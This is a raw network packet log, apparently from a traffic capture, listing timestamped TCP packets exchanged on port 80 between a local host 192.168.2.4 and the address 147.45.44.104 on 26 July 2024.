Jul 26, 2024 18:56:39.699198008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.699791908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.699804068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.699814081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.699826002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.699841022 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.699868917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.700790882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.700803041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.700813055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.700836897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.700853109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.701757908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.701802969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.702045918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.702083111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.702086926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.702095985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.702121019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.702137947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.703053951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.703066111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.703075886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.703087091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.703104019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.703128099 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.705167055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.705179930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.705189943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.705228090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.705393076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.705405951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.705434084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.705440998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.705455065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.705476999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.705492973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.706350088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.706362009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.706371069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.706382990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.706402063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.706423044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.707262039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.707273960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.707284927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.707310915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.707329035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.708360910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.708374023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.708384037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.708409071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.708432913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.708919048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.708931923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.708941936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.708952904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.708961964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.708992004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.709744930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.709757090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.709767103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.709790945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.709808111 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.710575104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.710586071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.710597038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.710618973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.710644960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.711384058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.711396933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.711405993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.711416960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.711432934 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.711458921 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.712338924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.712351084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.712362051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.712382078 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.712403059 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.713061094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.713072062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.713082075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.713107109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.713129997 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.713927031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.713941097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.713949919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.713973999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.713998079 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.747428894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.747517109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.747569084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.747581959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.747611046 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.747639894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.748027086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.748039961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.748051882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.748080969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.748106956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.748841047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.748852968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.748864889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.748903990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.748919010 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.749763966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.749775887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.749788046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.749799967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.749816895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.749931097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.750499964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.750513077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.750521898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.750570059 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.750932932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.751508951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.751521111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.751533031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.751591921 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.752099037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.752113104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.752125025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.752136946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.752154112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.752173901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.752948046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.752962112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.752973080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.753009081 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.756228924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756242037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756252050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756279945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.756295919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756299019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.756310940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756326914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756334066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.756340981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756351948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756359100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.756385088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.756393909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756407022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756417036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756427050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.756428003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756460905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.756738901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756752014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756762028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756773949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756778955 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.756784916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.756795883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.756823063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.757417917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.757431030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.757442951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.757453918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.757468939 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.757484913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.757917881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.757931948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.757941961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.757952929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.757963896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.757966042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.757987022 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.758004904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.758843899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.758856058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.758867025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.758878946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.758892059 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.758919954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.759788990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.759800911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.759810925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.759821892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.759835958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.759855986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.760586023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.760597944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.760608912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.760618925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.760627031 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.760631084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.760654926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.760684013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.762490988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.762504101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.762516975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.762528896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.762540102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.762540102 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.762573004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.762770891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.762780905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.762790918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.762800932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.762814045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.762834072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.768889904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.768940926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.768954039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.768965960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.768992901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.769009113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.769480944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.769491911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.769501925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.769512892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.769526005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.769552946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.770240068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.770251036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.770262003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.770272970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.770283937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.770304918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.771141052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.771152973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.771162987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.771173000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.771179914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.771212101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.771961927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.771975040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.771985054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.771996975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.772006989 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.772007942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.772022963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.772054911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.773085117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.773098946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.773108959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.773121119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.773133993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.773149967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.773761034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.773772955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.773782015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.773793936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.773804903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.773808002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.773828030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.773843050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.774698973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.774712086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.774722099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.774734020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.774744034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.774753094 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.774780989 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.303913116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.303987980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.304008007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.304025888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.304039001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.304065943 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.304537058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.304570913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.304584980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.304606915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.304608107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.304644108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.304647923 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.304682970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.305320978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.305356026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.305366039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.305388927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.305391073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.305424929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.305430889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.305459976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.305464983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.305499077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.306113958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.306124926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.306133986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.306143999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.306153059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.306160927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.306210041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.306687117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.306741953 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.306852102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.306862116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.306871891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.306890011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.306907892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.307533026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.307583094 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.307687044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.307697058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.307701111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.307737112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.307749033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.307784081 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.308558941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.308569908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.308593988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.308605909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.308701992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.308712959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.308722973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.308734894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.308751106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.309331894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.309343100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.309353113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.309369087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.309391975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.309469938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.309508085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.310233116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.310244083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.310267925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.310281992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.310380936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.310393095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.310415030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.310426950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.311288118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.311299086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.311311007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.311321020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.311330080 CEST	80	49757	147.45.44.104	192.168.2.4
